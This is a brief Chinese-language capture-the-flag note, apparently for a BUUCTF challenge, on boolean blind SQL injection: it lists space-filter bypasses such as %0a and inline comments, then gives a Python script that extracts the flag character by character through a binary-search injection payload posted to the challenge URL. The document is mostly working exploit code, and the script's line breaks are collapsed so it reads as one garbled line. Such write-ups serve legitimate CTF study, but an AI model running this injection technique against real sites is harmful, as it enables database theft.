BOOL盲注 异或注入
1,2返回结果,()可以使用,大部分函数可以使用
空格过滤::%0a,%0b,%0c,%0d,%09,/*/,/!*/,(TAB)
使用二分法盲治脚本
import requestsimport timeurl = "http://e93a4c52-4dfd-4bb1-afc3-b9f20eea580e.node3.buuoj.cn/index.php"anser = "Hello, glzjin wants a girlfriend."flag = ""for i in range(1,50):time.sleep(1)high = 127low = 32mid = (high+low)//2while high>low:payload="if(ascii(substr((select flag from flag),{},1)>{},1,2)".format(i,mid)data = {"id":payload}response = requests.post(url=url,data=data)if anser in response.text:low = mid+1else:high = midmid = (high+low)//2flag += chr(mid)print(flag)
